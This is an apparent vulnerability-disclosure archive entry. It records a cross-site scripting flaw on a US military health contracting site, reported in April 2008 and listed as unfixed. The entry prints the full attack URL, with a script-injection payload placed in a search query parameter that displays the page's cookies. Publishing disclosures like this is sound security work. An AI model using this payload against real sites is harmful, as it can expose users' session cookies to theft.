Security researcher PaPPy, has submitted on 24/04/2008 a cross-site-scripting (XSS) vulnerability affecting services.tma.osd.mil, which at the time of submission ranked 24388 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 24/04/2008 |
Date published: 25/04/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: PaPPy |
Domain: services.tma.osd.mil |
Category: XSS |
Pagerank: 24388 |
URL: http://services.tma.osd.mil/tricare_search/JSPSearches/Contracting/template.jsp?OldQueryText=testicl es&Collection=AcquisitionPolicy&Searched=&Topic=CON_tam&Topic=CON_tapdocs&Topic=CON_paDocs&Topic=CON _Letters&Topic=CON_TMALetters&SearchPage=http%3A%2F%2Ftricare.osd.mil%2Fcontracting%2Facquisitionpol icy%2Fcontracting_searchForm.cfm&Title=Search+Acquisition+Policy&NewQueryText="><script>alert(docume nt.cookie);</script> |
Click here to view the mirror
|
|
|